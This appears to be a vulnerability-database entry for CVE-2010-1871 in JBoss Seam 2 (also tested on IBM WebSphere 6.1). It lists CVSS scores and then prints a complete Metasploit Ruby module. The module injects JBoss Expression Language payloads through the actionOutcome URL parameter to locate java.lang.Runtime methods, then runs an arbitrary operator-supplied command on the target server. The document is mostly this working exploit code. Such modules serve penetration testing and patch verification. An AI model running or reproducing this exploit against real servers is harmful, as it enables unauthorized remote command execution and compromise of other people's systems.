JBoss Seam 2 Remote Command Execution

2024-08-3100:00:00

Cristiano Maruti, guerrino di massa, metasploit.com

packetstormsecurity.com

jboss seam 2

remote command execution

vulnerability

jboss enterprise application platform

red hat linux

ibm websphere 6.1

remote code execution

crafted url

java security manager

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

AI Score

7.4

Confidence

Low

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'JBoss Seam 2 Remote Command Execution',  
'Description' => %q{  
JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform  
4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression  
Language (EL) expressions, which allows remote attackers to execute arbitrary code  
via a crafted URL. This modules also has been tested successfully against IBM  
WebSphere 6.1 running on iSeries.  
  
NOTE: this is only a vulnerability when the Java Security Manager is not properly  
configured.  
},  
'Author' => [  
'guerrino di massa', # Metasploit module  
'Cristiano Maruti <cmaruti[at]gmail.com>' # Support for IBM Websphere 6.1  
],  
'License' => MSF_LICENSE,  
'References' => [  
[ 'CVE', '2010-1871' ],  
[ 'OSVDB', '66881']  
],  
'DisclosureDate' => '2010-07-19'  
)  
)  
  
register_options(  
[  
Opt::RPORT(8080),  
OptString.new('TARGETURI', [ true, 'Target URI', '/seam-booking/home.seam']),  
OptString.new('CMD', [ true, 'The command to execute.'])  
]  
)  
end  
  
def run  
uri = normalize_uri(target_uri.to_s)  
cmd_enc = ''  
cmd_enc << Rex::Text.uri_encode(datastore['CMD'])  
  
flag_found_one = 255  
flag_found_two = 255  
  
uri_part_1 = "?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["  
uri_part_2 = "].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["  
uri_part_3 = "].invoke(null),'"  
  
25.times do |index|  
req = uri + uri_part_1 + index.to_s + ']}'  
  
res = send_request_cgi(  
{  
'uri' => req,  
'method' => 'GET'  
}, 20  
)  
  
if (res && res.headers['Location'] =~ (/java.lang.Runtime.exec%28java.lang.String%29/))  
flag_found_one = index  
print_status('Found right index at [' + index.to_s + '] - exec')  
elsif (res && res.headers['Location'] =~ (/java.lang.Runtime\+java.lang.Runtime.getRuntime/))  
print_status('Found right index at [' + index.to_s + '] - getRuntime')  
flag_found_two = index  
else  
print_status('Index [' + index.to_s + ']')  
end  
end  
  
if (flag_found_one != 255 && flag_found_two != 255)  
print_status('Target appears VULNERABLE!')  
print_status('Sending remote command:' + datastore['CMD'])  
  
req = uri + uri_part_1 + flag_found_one.to_s + uri_part_2 + flag_found_two.to_s + uri_part_3 + cmd_enc + "')}"  
  
res = send_request_cgi(  
{  
'uri' => req,  
'method' => 'GET'  
}, 20  
)  
  
if (res && res.headers['Location'] =~ (/pwned=java.lang.UNIXProcess/))  
print_good('Exploited successfully')  
else  
print_error('Exploit failed')  
end  
else  
print_error('Target appears not vulnerable!')  
end  
end  
end  
`